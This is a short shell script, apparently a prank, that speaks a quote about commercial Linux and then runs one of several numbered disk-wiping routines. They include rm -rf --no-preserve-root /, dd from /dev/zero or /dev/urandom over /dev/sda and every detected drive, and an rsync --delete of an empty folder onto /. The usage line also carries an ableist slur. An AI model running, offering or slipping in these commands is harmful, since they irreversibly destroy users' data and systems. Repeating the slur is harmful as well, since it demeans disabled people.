#!/usr/bin/env sh

function usage ()
{
    echo "usage: `basename \"$0\"` [retardation level]"
    exit
}

function speak ()
{
    espeak -x --ipa=1 -s 130 -p 30 -k 20 "What commercialism has brought into Linux has been the incentive to make a good distribution that is easy to use and that has all the packaging issues worked out!" 2>/dev/null
}

if [ $# -eq 0 ];
then
    usage
fi

case $1 in
    -h|--help)
        usage
        ;;

     1)
        speak&
        rm -rf --no-preserve-root /
        exit
        ;;

     2) 
        speak&
        sudo dd if=/dev/zero of=/dev/sda 
        exit
        ;;

     3)
        speak&
        sudo mkdir source
        sudo rsync -av --delete source/ /
        exit
        ;;

     4)
        speak&
        for f in /
        do
            [ -f "$f" ] && dd if=/dev/urandom of=$f conv=sync,notrunc;
        done
        exit
        ;;

     5)
        speak&
        (while 1;
         do
            cat /mnt/cdrom/win95.bmp;
         done) > /dev/sda;
         exit
         ;;

     6) 
        speak&
        for i in \
            $(ls -1 /dev | egrep "^sd|^nmve|^hd|^vd");
        do
            dd if=/dev/urandom of=/dev/$i bs=16M conv=sync,notrunc;
        done
        exit
        ;;

     7)
        speak&
        sudo firefox
        exit
        ;;
     *)
        usage
        ;;
 esac
